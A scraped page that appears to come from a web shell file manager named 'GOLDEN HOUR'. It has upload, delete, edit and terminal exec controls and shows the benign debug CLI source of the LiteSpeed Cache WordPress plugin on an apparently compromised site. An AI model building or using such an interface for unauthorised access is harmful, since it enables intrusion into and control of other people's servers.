GOLDEN HOUR
DIR: /home/vlabbdco/public_html/wp-content/plugins/litespeed-cache/cli
UP
UPLOAD
Name
Size
Action
debug.cls.php
553 B
DEL
image.cls.php
2.99 KB
DEL
online.cls.php
3.31 KB
DEL
option.cls.php
7.91 KB
DEL
purge.cls.php
6.75 KB
DEL
Edit: debug.cls.php
<?php namespace LiteSpeed\CLI; defined( 'WPINC' ) || exit; use LiteSpeed\Debug2; use LiteSpeed\Report; use WP_CLI; /** * Debug API CLI */ class Debug { private $__report; public function __construct() { Debug2::debug( 'CLI_Debug init' ); $this->__report = Report::cls(); } /** * Send report * * ## OPTIONS * * ## EXAMPLES * * # Send env report to LiteSpeed * $ wp litespeed-debug send * */ public function send() { $num = $this->__report->post_env(); WP_CLI::success( 'Report Number = ' . $num ); } }
SAVE FILE
TERMINAL
EXEC